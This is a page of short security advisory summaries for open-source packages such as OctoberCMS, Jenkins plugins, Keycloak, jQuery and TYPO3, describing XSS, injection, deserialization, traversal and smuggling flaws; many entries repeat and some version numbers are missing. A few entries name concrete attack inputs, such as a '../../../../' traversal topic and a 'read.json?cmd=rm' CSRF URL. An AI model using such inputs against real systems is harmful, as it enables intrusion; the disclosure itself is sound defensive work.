Advisories

url-regex is vulnerable to Regular Expression Denial of Service. An attacker providing a very long string in String.test can cause a Denial of Service.

The October CMS debugbar plugin contains a feature where it will log all requests (and all information pertaining to each request including session data) whenever it is enabled. This presents a problem if the plugin is ever enabled on a system that is open to untrusted users as the potential exists for them to use this feature to view all requests being made to the application and obtain sensitive information …

In OctoberCMS, an attacker can read local files of an October CMS server. The vulnerability is only exploitable by an authenticated backend user with the cms.manage_assets permission. Issue has been patched in Build.

mozjpeg has a heap-based buffer over-read in get_rgb_row() in rdppm.c via a malformed PPM input file.

libjpeg-turbo has a heap-based buffer over-read in get_rgb_row() in rdppm.c via a malformed PPM input file.

Jenkins Play Framework Plug lets users specify the path to the play command on the Jenkins master for a form validation endpoint, resulting in an OS command injection vulnerability exploitable by users able to store such a file on the Jenkins master.

Apache Ignite uses a database to build SQL distributed execution engine that provides SQL functions which could be used by attacker to access to a filesystem.

In WatermelonDB (NPM package "@nozbe/watermelondb"), a maliciously crafted record ID can exploit a SQL Injection vulnerability in iOS adapter implementation and cause the app to delete all or selected records from the database, generally causing the app to become unusable. This may happen in apps that don't validate IDs (valid IDs are /^[a-zA-Z0-9_-.]+$/) and use Watermelon Sync or low-level database.adapter.destroyDeletedRecords method. The integrity risk is low due to the fact …

In OctoberCMS (october/october composer package) versions from 1.0.319 and before 1.0.466, any users with the ability to modify any data that could eventually be exported as a CSV file from the ImportExportController could potentially introduce a CSV injection into the data to cause the generated CSV export file to be malicious. This requires attackers to achieve the following before a successful attack can be completed: 1. Have found a vulnerability …

In OctoberCMS (october/october composer package) versions from 1.0.319 and before 1.0.466, a user with the ability to use the import functionality of the ImportExportController behavior can be socially engineered by an attacker to upload a maliciously crafted CSV file which could result in a reflected XSS attack on the user in question Issue has been patched in Build 466 (v1.0.466).

In OctoberCMS, a user with the ability to use the import functionality of the ImportExportController behavior can be socially engineered by an attacker to upload a maliciously crafted CSV file which could result in a reflected XSS attack.

In OctoberCMS (october/october composer package) versions from 1.0.319 and before 1.0.466, an attacker can exploit this vulnerability to read local files of an October CMS server. The vulnerability is only exploitable by an authenticated backend user with the cms.manage_assets permission. Issue has been patched in Build 466 (v1.0.466).

In OctoberCMS, an attacker can delete arbitrary local files of an October CMS server. The vulnerability is only exploitable by an authenticated backend user with the cms.manage_assets permission.

In OctoberCMS, an attacker can upload files to any directory of an October CMS server. The vulnerability is only exploitable by an authenticated backend user with the cms.manage_assets permission.

In OctoberCMS (october/october composer package) versions from 1.0.319 and before 1.0.466, an attacker can exploit this vulnerability to upload jpg, jpeg, bmp, png, webp, gif, ico, css, js, woff, woff2, svg, ttf, eot, json, md, less, sass, scss, xml files to any directory of an October CMS server. The vulnerability is only exploitable by an authenticated backend user with the cms.manage_assets permission. Issue has been patched in Build 466 (v1.0.466).

In OctoberCMS (october/october composer package) versions from 1.0.319 and before 1.0.466, an attacker can exploit this vulnerability to delete arbitrary local files of an October CMS server. The vulnerability is only exploitable by an authenticated backend user with the cms.manage_assets permission. Issue has been patched in Build 466 (v1.0.466).

Jenkins ECharts API Plugin does not escape the parser identifier when rendering charts, resulting in a stored cross-site scripting vulnerability.

Jenkins Script Security Plugin does not correctly escape pending or approved classpath entries on the In-process Script Approval page, resulting in a stored cross-site scripting vulnerability.

Jenkins ECharts API Plugin does not escape the display name of the builds in the trend chart, resulting in a stored cross-site scripting vulnerability.

Jenkins Subversion Partial Release Manager Plugin does not escape the error message for the repository URL field form validation, resulting in a reflected cross-site scripting vulnerability.

Jenkins Compact Columns Plugin displays the unprocessed job description in tooltips, resulting in a stored cross-site scripting vulnerability that can be exploited by users with Job/Configure permission.

Jenkins Selenium Plugin has no CSRF protection for its HTTP endpoints, allowing attackers to perform all administrative actions provided by the plugin.

In OctoberCMS, any users with the ability to modify any data that could eventually be exported as a CSV file from the ImportExportController could potentially introduce a CSV injection into the data to cause the generated CSV export file to be malicious. This requires attackers to achieve the following before a successful attack can be completed: Have found a vulnerability in the victim's spreadsheet software of choice. Control data that …

websocket-extensions ruby module allows Denial of Service (DoS) via Regex Backtracking. The extension parser may take quadratic time when parsing a header containing an unclosed string parameter value whose content is a repeating two-byte sequence of a backslash and some other character. This could be abused by an attacker to conduct Regex Denial Of Service (ReDoS) on a single-threaded server by providing a malicious payload with the Sec-WebSocket-Extensions header.

websocket-extensions npm module allows Denial of Service (DoS) via Regex Backtracking. The extension parser may take quadratic time when parsing a header containing an unclosed string parameter value whose content is a repeating two-byte sequence of a backslash and some other character. This could be abused by an attacker to conduct Regex Denial Of Service (ReDoS) on a single-threaded server by providing a malicious payload with the Sec-WebSocket-Extensions header.

By sending a specially crafted packet, an attacker could trigger a Null Pointer Exception resulting in a Denial of Service. This could be sent to the ingress gateway or a sidecar, triggering a null pointer exception which results in a denial of service.

common.php in the Gravity Forms plugin for WordPress can leak hashed passwords because user_pass is not considered a special case for a $current_user->get($property) call.

serialize-javascript allows remote attackers to inject arbitrary code via the function deleteFunctions within index.js.

reel allows Request Smuggling attacks due to incorrect Content-Length and Transfer-Encoding header parsing. It is possible to conduct HTTP request smuggling attacks by sending the Content-Length header twice. Furthermore, invalid Transfer Encoding headers were found to be parsed as valid which could be leveraged for TE:CL smuggling attacks.

snyk-broker is vulnerable to Arbitrary File Read. It allows arbitrary file reads for users with access to Snyk's internal network via directory traversal.

snyk-broker is vulnerable to Information Exposure. It logs private keys if logging level is set to DEBUG.

snyk-broker is vulnerable to Arbitrary File Read. It allows partial file reads for users who have access to Snyk's internal network via patch history from GitHub Commits API.

snyk-broker is vulnerable to Arbitrary File Read. It allows arbitrary file reads for users with access to Snyk's internal network by creating symlinks to match certain paths.

snyk-broker is vulnerable to Arbitrary File Read. It allows arbitrary file reads for users who have access to Snyk's internal network by appending the URL with a fragment identifier and a path e.g., #package.json.

snyk-broker allows arbitrary file reads to users with access to Snyk's internal network for any files ending with the following extensions: .yaml, .yml or json.

An unauthenticated privilege-escalation issue exists in the bbPress plug for WordPress when New User Registration is enabled.

parser/js/js-scanner.c in JerryScript mishandles errors during certain out-of-memory conditions, as demonstrated by a scanner_reverse_info_list NULL pointer dereference and a scanner_scan_all assertion failure.

node-dns-sync (npm module dns-sync) through 0.2.0 allows execution of arbitrary commands . This issue may lead to remote code execution if a client of the library calls the vulnerable method with untrusted input. This has been fixed in 0.2.1.

An access bypass vulnerability exists when the experimental Workspaces module. This can be mitigated by disabling the Workspaces module.

An access bypass vulnerability exists when the experimental Workspaces module. This can be mitigated by disabling the Workspaces module.

In Kaminari, there is a vulnerability that would allow an attacker to inject arbitrary code into pages with pagination links.

JerryScript allows attackers to cause a denial of service (stack consumption) via a proxy operation.

JerryScript allows attackers to cause a denial of service (assertion failure) because a property key query for a Proxy object returns unintended data.

Centreon exposes Session IDs in server responses.

aegir may leak secrets from environment variables in the browser bundle published to npm.

A flaw was found in Undertow, regarding the processing of invalid HTTP requests with large chunk sizes. This flaw allows an attacker to take advantage of HTTP request smuggling.

The bbPress plug for WordPress has stored XSS in the Forum creation section, resulting in JavaScript execution at wp-admin/edit.php?post_type=forum (aka the Forum listing page) for all users. An administrator can exploit this at the wp-admin/post.php?action=edit URI.

In ActiveSupport, there is potentially unexpected behaviour in the MemCacheStore and RedisCacheStore where, when untrusted user input is written to the cache store using the raw: true parameter, re-reading the result from the cache can evaluate the user input as a Marshalled object instead of plain text. Vulnerable code looks like: data = cache.fetch("demo", raw: true) { untrusted_string } Versions Affected: rails < 5.2.5, rails < 6.0.4 Not affected: Applications …

The knock-knock plugin for Craft CMS suffers from an open redirect flaw.

The knock-knock plugin for Craft CMS may allow a user who injects a specially crafted X-Forwarded-For HTTP header to bypass IP restrictions.

EM-HTTP-Request uses the library eventmachine insecurely, allowing an attacker to perform a man-in-the-middle attack against users of the library. The hostname in a TLS server certificate is not verified.

An issue was discovered in the Image Resizer plug for Craft CMS. There is stored XSS in the Bulk Resize action.

An issue was discovered in the Image Resizer plug for Craft CMS. There are CSRF issues with the log-clear controller action.

An exploitable vulnerability exists in the configuration-loading functionality of the jw.util package for Python. When loading a configuration with FromString or FromStream with YAML, one can execute arbitrary Python code, resulting in OS command execution, because safe_load is not used.

Apache Kylin has some restful apis which will concatenate os command with the user input string, a user is likely to be able to execute any os command without any protection or validation.

Apache CXF ships with a OpenId Connect JWK Keys service, which allows a client to obtain the public keys in JWK format, which can then be used to verify the signature of tokens issued by the service. Typically, the service obtains the public key from a local keystore (JKS/PKCS12) by specifing the path of the keystore and the alias of the keystore entry. This case is not vulnerable. However it …

Apache CXF ships with a OpenId Connect JWK Keys service, which allows a client to obtain the public keys in JWK format, which can then be used to verify the signature of tokens issued by the service. Typically, the service obtains the public key from a local keystore (JKS/PKCS12) by specifing the path of the keystore and the alias of the keystore entry. This case is not vulnerable. However it …

In GitLab Puma (RubyGem), a client could smuggle a request through a proxy, causing the proxy to send a response back to another unknown client. If the proxy uses persistent connections and the client adds another request in via HTTP pipelining, the proxy may mistake it as the first request's body. Puma, however, would see it as two requests, and when processing the second request, send back a response that …

In GitLab Puma (RubyGem), an attacker could smuggle an HTTP response, by using an invalid transfer-encoding header.

In Puma (RubyGem), an attacker could smuggle an HTTP response, by using an invalid transfer-encoding header.

In Puma (RubyGem), a client could smuggle a request through a proxy, causing the proxy to send a response back to another unknown client. If the proxy uses persistent connections and the client adds another request in via HTTP pipelining, the proxy may mistake it as the first request's body. Puma, however, would see it as two requests, and when processing the second request, send back a response that the …

A denial of service vulnerability exists when dotnet Core or dotnet Framework improperly handles web requests.

Centreon allows remote attackers to execute arbitrary OS commands by placing shell metacharacters in RRDdatabase_status_path (found in main.get.php) and then visiting the include/views/graphs/graphStatus/displayServiceStatus.php page.

There is a possible information disclosure issue in Active Resource <v5.1.1 that could allow an attacker to create specially crafted requests to access data in an unexpected way and possibly leak information.

A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory.

A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge (HTML-based).

A denial of service vulnerability exists when ASP.NET Core improperly handles web requests, aka 'ASP.NET Core Denial of Service Vulnerability'.

It is possible to create an SCORM package in such a way that when added to a course, it could be interacted with via web services in order to achieve remote code execution.

Jodd before performs Deserialization of Untrusted JSON Data when setClassMetadataName is set.

HtmlUnit prior to 2.37.0 contains code execution vulnerabilities. HtmlUnit initializes Rhino engine improperly, hence a malicious JavScript code can execute arbitrary Java code on the application. Moreover, when embedded in Android application, Android-specific initialization of Rhino engine is done in an improper way, hence a malicious JavaScript code can execute arbitrary Java code on the application.

The DMS/ECM module in Dolibarr allows users with the 'Setup documents directories' permission to rename uploaded files to have insecure file extensions. This bypasses the .noexe protection mechanism against XSS.

In Gitea, an attacker can trigger a deadlock by initiating a transfer of a repository's ownership from one organization to another.

When using Apache Tomcat to M1 to to to if a) an attacker is able to control the contents and name of a file on the server; and b) the server is configured to use the PersistenceManager with a FileStore; and c) the PersistenceManager is configured with sessionAttributeValueClassNameFilter="null" (the default unless a SecurityManager is used) or a sufficiently lax filter to allow the attacker provided object to be deserialized; and …

When using Apache Tomcat, an attacker is able to control the contents and name of a file on the server.

Versions of jquery prior to 1.9.0 are vulnerable to Cross-Site Scripting. The load method fails to recognize and remove <script> HTML tags that contain a whitespace character, i.e: </script >, which results in the enclosed script logic to be executed. This allows attackers to execute arbitrary JavaScript in a victim's browser.

Versions of jquery prior to 1.9.0 are vulnerable to Cross-Site Scripting. The load method fails to recognize and remove <script> HTML tags that contain a whitespace character, i.e: </script >, which results in the enclosed script logic to be executed. This allows attackers to execute arbitrary JavaScript in a victim's browser.

Versions of jquery prior to 1.9.0 are vulnerable to Cross-Site Scripting. The load method fails to recognize and remove <script> HTML tags that contain a whitespace character, i.e: </script >, which results in the enclosed script logic to be executed. This allows attackers to execute arbitrary JavaScript in a victim's browser.

Versions of jquery prior to 1.9.0 are vulnerable to Cross-Site Scripting. The load method fails to recognize and remove <script> HTML tags that contain a whitespace character, i.e: </script >, which results in the enclosed script logic to be executed. This allows attackers to execute arbitrary JavaScript in a victim's browser.

The DMS/ECM module in Dolibarr renders user-uploaded .html files in the browser when the attachment parameter is removed from the direct download link. Rendering these files directly, may lead to XSS.

Attacker controlling unescaped part of uri for httplib2.Http.request() could change request headers and body, send additional hidden requests to same server. Impacts software that uses httplib2 with uri constructed by string concatenation, as opposed to proper urllib building with escaping.

A flaw was found in resteasy where an improper input validation results in returning an illegal header that integrates into the server's response. This flaw may result in an injection, which leads to unexpected behavior when the HTTP response is constructed.

em-imap uses the library eventmachine insecurely, allowing an attacker to perform a man-in-the-middle attack against users of the library. The hostname in a TLS server certificate is not verified.

jQuery, which is used by the rdoc gem, allows Cross-site Scripting attacks via the load method. The load method fails to recognize and remove <script> HTML tags that contain a whitespace character, i.e., </script >, which results in the enclosed script logic to be executed.

An issue was discovered in GWTUpload's server/UploadServlet.java (the servlet for handling file upload) accepts a delay parameter that causes a thread to sleep. It can be abused to cause all of a server's threads to sleep, leading to denial of service.

The (1) JpegImagePlugin.py and (2) EpsImagePlugin.py scripts in Python Image Library (PIL) 1.1.7 and earlier and Pillow before 2.3.1 uses the names of temporary files on the command line, which makes it easier for local users to conduct symlink attacks by listing the processes.

Dolibarr is vulnerable to XSS.

The kerberos package for Node.js allows arbitrary code execution and privilege escalation. The flaw may be exploited by injecting malicious DLLs, due to incorrect handling of DLL search paths in the kerberos_sspi LoadLibrary() method.

Attackers could trick execa into executing arbitrary binaries. This behaviour is caused by the setting preferLocal=true which makes execa search for locally installed binaries and executes them. This vulnerability is usually only exploitable when using execa on a client-side LOCAL application.

A flaw was discovered in jackson-databind in versions before 2.9.10, 2.8.11.5, and 2.6.7.3, where it would permit polymorphic deserialization of a malicious object using commons-configuration 1 and 2 JNDI classes. An attacker could use this flaw to execute arbitrary code.

FasterXML jackson-databind 2.x before 2.9.10.4, 2.8.11.6, and 2.7.9.7 mishandles the interaction between serialization gadgets and typing, related to com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig (aka ibatis-sqlmap).

FasterXML jackson-databind 2.x before 2.9.10.4, 2.8.11.6, and 2.7.9.7 mishandles the interaction between serialization gadgets and typing, related to br.com.anteros.dbcp.AnterosDBCPConfig (aka anteros-core).

FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.aoju.bus.proxy.provider.remoting.RmiProvider (aka bus-proxy).

FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.springframework.aop.config.MethodLocatingFactoryBean (aka spring-aop).

FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.openjpa.ee.WASRegistryManagedRuntime (aka openjpa).

A flaw was found in Keycloak where it does not perform the TLS hostname verification while sending emails using the SMTP server. This flaw allows an attacker to perform a man-in-the-middle (MITM) attack.

A flaw was found in Keycloak where it does not perform the TLS hostname verification while sending emails using the SMTP server. This flaw allows an attacker to perform a man-in-the-middle (MITM) attack.

MISP MISP-maltego incorrectly shares a MISP connection across users in a remote-transform use case.

pandas can unserialize and execute commands from an untrusted file that is passed to the read_pickle() function, if reduce makes an os.system call.

An XSS issue was identified on the Subrion CMS /panel/configuration/general settings page. A remote attacker can inject arbitrary JavaScript code in the v[language_switch] parameter (within multipart/form-data), which is reflected back within a user's browser without proper output encoding.

A Cross-Site Request Forgery (CSRF) vulnerability was discovered in Subrion that allows a remote attacker to remove files on the server without a victim's knowledge, by enticing an authenticated user to visit an attacker's web page. The application fails to validate the CSRF token for a GET request. An attacker can craft a panel/uploads/read.json?cmd=rm URL (removing this token) and send it to the victim.

Lack of output sanitization can lead to the execution arbitrary shell commands via the logkitty npm package.

Spring Security uses a fixed null initialization vector with CBC Mode in the implementation of the queryable text encryptor. A malicious user with access to the data that has been encrypted using such an encryptor may be able to derive the unencrypted values using a dictionary attack.

In Apache RocketMQ, when the automatic topic creation in the broker is turned on by default, an evil topic like ../../../../topic2020 is sent from rocketmq-client to the broker, a topic folder will be created in the parent directory in brokers, which leads to a directory traversal vulnerability.

In Apache RocketMQ, when the automatic topic creation in the broker is turned on by default, an evil topic like ../../../../topic2020 is sent from rocketmq-client to the broker, a topic folder will be created in the parent directory in brokers, which leads to a directory traversal vulnerability.

When running a process with an enabled JMXReporter, with a port configured via metrics.reporter.reporter_name > .port, an attacker with local access to the machine and JMX port can execute a man-in-the-middle attack using a specially crafted request to rebind the JMXRMI registry to one under the attacker's control. This compromises any connection established to the process via JMX, allowing extraction of credentials and any other transferred data.

Apache Ant uses the default temporary directory identified by the Java system property java.io.tmpdir for several tasks and may thus leak sensitive information. The fixcrlf and replaceregexp tasks also copy files from the temporary directory back into the build tree allowing an attacker to inject modified source files into the build process.

Calling unserialize() on malicious user-submitted content can lead to modification of dynamically-determined object attributes and result in triggering deletion of an arbitrary directory in the file system, if it is writable for the web server. It can also trigger message submission via email using the identity of the website (mail relay). Another insecure deserialization vulnerability is required to actually exploit mentioned aspects.

Calling unserialize() on malicious user-submitted content can lead to modification of dynamically-determined object attributes and result in triggering deletion of an arbitrary directory in the file system, if it is writable for the web server. It can also trigger message submission via email using the identity of the website (mail relay). Another insecure deserialization vulnerability is required to actually exploit mentioned aspects.

A buffer overflow vulnerability has been found in the baremetal component of Apache CloudStack. The vulnerability is due to the lack of validation of the mac parameter in baremetal virtual router. If you insert an arbitrary shell command into the mac parameter, v-router will process the command.

Apache Camel's JMX is vulnerable to a Rebind Flaw.

It has been discovered that backend user settings (in $BE_USER->uc) are vulnerable to insecure deserialization. In combination with vulnerabilities of third party components, this can lead to remote code execution. A valid backend user account is needed to exploit this vulnerability.

Apache Camel Netty enables Java deserialization by default.

Apache Camel RabbitMQ enables Java deserialization by default.

It has been discovered that backend user settings (in $BE_USER->uc) are vulnerable to insecure deserialization. In combination with vulnerabilities of third party components, this can lead to remote code execution. A valid backend user account is needed to exploit this vulnerability.

In Apache ActiveMQ, the webconsole admin GUI is open to XSS, in the view that lists the contents of a queue.

In TYPO3 CMS, it has been discovered that the backend user interface and install tool are vulnerable to a same-site request forgery. A backend user can be tricked into interacting with a malicious resource an attacker previously managed to upload to the web server. Scripts are then executed with the privileges of the victims' user session. In a worst-case scenario, new admin users can be created which can directly be …

In TYPO3 CMS, it has been discovered that the backend user interface and install tool are vulnerable to a same-site request forgery. A backend user can be tricked into interacting with a malicious resource an attacker previously managed to upload to the web server. Scripts are then executed with the privileges of the victims' user session. In a worst-case scenario, new admin users can be created which can directly be …

H2, as used in Datomic and other products, allows remote code execution because CREATE ALIAS can execute arbitrary Java code.

TensorFlow before 1.7.0 has an integer overflow that causes an out-of-bounds read, possibly causing disclosure of the contents of process memory. This occurs in the DecodeBmp feature of the BMP decoder in core/kernels/decode_bmp_op.cc.

TensorFlow before 1.7.0 has an integer overflow that causes an out-of-bounds read, possibly causing disclosure of the contents of process memory. This occurs in the DecodeBmp feature of the BMP decoder in core/kernels/decode_bmp_op.cc.

In TYPO3 CMS 10.4.0 through 10.4.1, it has been discovered that time-based attacks can be used with the password reset functionality for backend users. This allows an attacker to mount user enumeration based on email addresses assigned to backend user accounts. This has been fixed in 10.4.2.

In TYPO3 CMS 10.4.0 through 10.4.1, it has been discovered that time-based attacks can be used with the password reset functionality for backend users. This allows an attacker to mount user enumeration based on email addresses assigned to backend user accounts. This has been fixed in 10.4.2.

When using the spring-security-saml2-service-provider component, a malicious user can carefully modify an otherwise valid SAML response and append an arbitrary assertion that Spring Security will accept as valid.

All versions before 1.6.7 of org.jooby:jooby are vulnerable to Directory Traversal via two separate vectors.

A flaw was found in Keycloak, where the code base contains usages of ObjectInputStream without type checks. This flaw allows an attacker to inject arbitrarily serialized Java Objects, which would then get deserialized in a privileged context and potentially lead to remote code execution.

A flaw was found in Keycloak, where the code base contains usages of ObjectInputStream without type checks. This flaw allows an attacker to inject arbitrarily serialized Java Objects, which would then get deserialized in a privileged context and potentially lead to remote code execution.

It has been discovered that HTML placeholder attributes containing data of other database records are vulnerable to cross-site scripting. A valid backend user account is needed to exploit this vulnerability.

It has been discovered that HTML placeholder attributes containing data of other database records are vulnerable to cross-site scripting. A valid backend user account is needed to exploit this vulnerability.

The SVG Sanitizer extension for TYPO3 has a cross-site scripting vulnerability. Slightly invalid or incomplete SVG markup is not correctly processed and thus not sanitized at all. Invalid markup it still is evaluated in browsers and may lead to cross-site scripting.

It has been discovered that link tags generated by the typolink functionality are vulnerable to cross-site scripting; properties being assigned as HTML attributes have not been parsed correctly.

It has been discovered that link tags generated by the typolink functionality are vulnerable to cross-site scripting; properties being assigned as HTML attributes have not been parsed correctly.

There is a vulnerability in actionpack_page-caching that allows an attacker to write arbitrary files to a web server, potentially resulting in remote code execution if the attacker can write unescaped ERB to a view.

SLPJS has a vulnerability where users could experience false-negative validation outcomes for MINT transaction operations. A poorly implemented SLP wallet could allow spending of the affected tokens which would result in the destruction of a user's minting baton.

In SLP Validate, users could experience false-negative validation outcomes for MINT transaction operations. A poorly implemented SLP wallet could allow spending of the affected tokens which would result in the destruction of a user's minting baton.

A flaw was found in the reset credential flow which allows an attacker to gain unauthorized access to the application.

A flaw in the reset credential flow in keycloak allows an attacker to gain unauthorized access to the application.

Jooby is vulnerable to a Directory Traversal via two separate vectors.

A flaw was found in Keycloak which allows a malicious user that is currently logged in, to see the personal information of a previously logged-out user in the account manager section.

A flaw in Keycloak allows a malicious user that is currently logged in, to see the personal information of a previously logged-out user in the account manager section.

A flaw was found in Keycloak. This flaw allows a malicious user that is currently logged-in, to see the personal information of a previously logged-out user in the account manager section.

In the SEOmatic plugin for Craft CMS, helpers/DynamicMeta.php does not properly sanitize the URL. This leads to Server-Side Template Injection and credentials disclosure via a crafted Twig template after a semicolon.

A flaw was found in keycloak. A logged exception in the HttpMethod class may leak the password given as parameter.

A logged exception in the HttpMethod class may leak the password given as parameter. The highest threat from this vulnerability is to data confidentiality.

A flaw was found in keycloak A logged exception in the HttpMethod class may leak the password given as parameter. The highest threat from this vulnerability is to data confidentiality.

Apache log4net does not disable XML external entities when parsing log4net configuration files. This could allow for XXE-based attacks in applications that accept arbitrary configuration files from users.

Apache log4net do not disable XML external entities when parsing log4net configuration files. This allows for XXE-based attacks in applications that accept attacker-controlled log4net configuration files.

Apache log4net does not disable XML external entities when parsing log4net configuration files. This could allow for XXE-based attacks in applications that accept arbitrary configuration files from users.

tinymce 4.7.11, 4.7.12 is affected by: CWE-79: Improper Neutralization of Input During Web Page Generation. The impact is: JavaScript code execution. The component is: Media element. The attack vector is: The victim must paste malicious content to media element's embed tab.

A flaw was found in Ansible when using modules which decrypts vault files. The temporary directory is created in /tmp and left unecrypted.

json-c has an integer overflow and out-of-bounds write via a large JSON file, as demonstrated by printbuf_memappend.

After a certificate error was overridden by the user, qutebrowser displays the URL as yellow (colors.statusbar.url.warn.fg). However, when the affected website was subsequently loaded again, the URL was mistakenly displayed as green (colors.statusbar.url.success_https). While the user already has seen a certificate error prompt at this point (or set content.ssl_strict to false which is not recommended), this could still provide a false sense of security.

Possible XXE during an EventPublisher update.

A flaw was found in Keycloak’s user-managed access interface, where it would permit a script to be set in the UMA policy. This flaw allows an authenticated attacker with UMA permissions to configure a malicious script to trigger and execute arbitrary code with the permissions of the user running the application.

A flaw was found in the Keycloak admin console, where the realm management interface permits a script to be set via the policy. This flaw allows an attacker with authenticated user and realm management permissions to configure a malicious script to trigger and execute arbitrary code with the permissions of the application user.

In Sprout Forms before 3.9.0, there is a potential Server-Side Template Injection vulnerability when using custom fields in Notification Emails which could lead to the execution of Twig code. This has been fixed in 3.9.0.

In Sprout Forms before 3.9.0, there is a potential Server-Side Template Injection vulnerability when using custom fields in Notification Emails which could lead to the execution of Twig code. This has been fixed in 3.9.0.

This advisory has been marked as False-Positive and removed.

In Shopizer, a script can be injected in various forms and saved in the database, then executed when information is fetched from backend.

A potential timing attack exists on pages or documents that have been protected with a shared password through Wagtail's "Privacy" controls. This password check is performed through a character-by-character string comparison, and so an attacker who is able to measure the time taken by this check to a high degree of accuracy could potentially use timing differences to gain knowledge of the password. (This is understood to be feasible on …

curlrequest allows reading any file by populating the file parameter with user input.

In Sorcery, there is a brute force vulnerability when using password authentication via Sorcery. The brute force protection submodule will prevent a brute force attack for the defined lockout period, but once expired, protection will not be re-enabled until a user or malicious actor logs in successfully. This does not affect users that do not use the built-in brute force protection submodule, nor users that use permanent account lockout.

In BookStack greater than or equal to 0.18.0 and less than 0.29.2, there is an XSS vulnerability in comment creation. A user with permission to create comments could POST HTML directly to the system to be saved in a comment, which would then be executed/displayed to others users viewing the comment. Through this vulnerability custom JavaScript code could be injected and therefore ran on other user machines. This most impacts …

In Java-WebSocket there is an Improper Validation of Certificate with Host Mismatch where WebSocketClient does not perform SSL hostname validation.

Jenkins Copy Artifact Plugin performs improper permission checks, allowing attackers to copy artifacts from jobs they have no permission to access.

A missing permission check in Jenkins Amazon EC2 Plugin form-related methods allows users with Overall/Read access to enumerate credential IDs of the credentials stored in Jenkins.

core/get_menudiv.php in Dolibarr allows remote authenticated attackers to bypass intended access restrictions via a non-alphanumeric menu parameter.

PySAML2 before 5.0.0 does not check that the signature in a SAML document is enveloped and thus signature wrapping is effective, i.e., it is affected by XML Signature Wrapping (XSW). The signature information and the node/object that is signed can be in different places and thus the signature verification will succeed, but the wrong data will be used. This specifically affects the verification of assertions that have been signed.

Jenkins Amazon EC2 Plugin unconditionally accepts self-signed certificates and does not perform hostname validation, enabling man-in-the-middle attacks.

A cross-site request forgery vulnerability in Jenkins CVS Plugin allows attackers to create and manipulate tags, and to connect to an attacker-specified URL.

A cross-site request forgery vulnerability in Jenkins Amazon EC2 Plugin allows attackers to provision instances.

Jenkins Amazon EC2 Plugin does not validate SSH host keys when connecting agents, enabling man-in-the-middle attacks.

macaron before has an open redirect in the static handler.

TensorFlow has an integer overflow that causes an out-of-bounds read, possibly causing disclosure of the contents of process memory. This occurs in the DecodeBmp feature of the BMP decoder in core/kernels/decode_bmp_op.cc.

Attackers could inject arbitrary JEXL expressions, leading to Remote Code Execution.

Doorkeeper contains an information disclosure vulnerability that allows an attacker to retrieve the client secret only intended for the OAuth application owner. After authorizing the application and allowing access, the attacker simply needs to request the list of their authorized applications in a JSON format (usually GET /oauth/authorized_applications.json). An application is vulnerable if the authorized application controller is enabled.

A flaw was found in Keycloak where a malicious user registers as oneself. The attacker could then use the remove devices form to post different credential IDs and possibly remove MFA devices for other users.

An attacker could use the 'remove devices form' to post different credential IDs and possibly remove MFA devices for other users.

An issue was discovered in service-api. It allows XXE, with resultant secrets disclosure and SSRF, via JUnit XML launch import.

Lack of authorization controls in REST API functions in TeamPass allows any TeamPass user with a valid API token to become a TeamPass administrator and read or modify all passwords via authenticated api/index.php REST API calls.

It was found that the Apache Syncope EndUser UI login page reflects the successMessage parameters. By this means, a user accessing the Enduser UI could execute javascript code from URL query string.

A Server-Side Template Injection in Apache Syncope enables attackers to inject arbitrary Java EL expressions, leading to an unauthenticated Remote Code Execution (RCE) vulnerability. Apache Syncope uses Java Bean Validation (JSR) custom constraint validators. When building custom constraint violation error messages, they support different types of interpolation, including Java EL expressions. Therefore, if an attacker can inject arbitrary data in the error message template being passed, they will be able …

All versions of chrome-launcher allow execution of arbitrary commands, by controlling the $HOME environment variable in Linux operating systems.

An archive traversal flaw was found in all ansible-engine, when running ansible-galaxy collection install. When extracting a collection .tar.gz file, the directory is created without sanitizing the filename. An attacker could take advantage to overwrite any file within the system.

Subrion CMS allows session fixation via an alphanumeric value in a session cookie.

Passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code.

Passing HTML containing <option> elements from untrusted sources - even after sanitizing them - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code.

Passing HTML containing <option> elements from untrusted sources - even after sanitizing them - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code.

Passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code.

Passing HTML containing <option> elements from untrusted sources - even after sanitizing them - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code.

Passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code.

Passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code.

Passing HTML containing <option> elements from untrusted sources - even after sanitizing them - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code.

Passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code.

Passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code.

Passing HTML containing <option> elements from untrusted sources - even after sanitizing them - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code.

Passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code.

TeamPass allows any authenticated TeamPass user to trigger a PHP file include vulnerability via a crafted HTTP request.

TeamPass allows an unauthenticated attacker to retrieve files from the TeamPass web root. This may include backups or LDAP debug files.

The REST API functions in TeamPass allow any user with a valid API token to bypass IP address allowlist restrictions via an X-Forwarded-For client HTTP header to the getIp function.

Actions Http-Client can disclose Authorization headers to incorrect domain in certain redirect scenarios. The conditions in which this happens are if consumers of the http-client: make an http request with an authorization header that request leads to a redirect (302) the redirect url redirects to another domain or hostname. Consequently, the authorization header will get passed to the other domain.

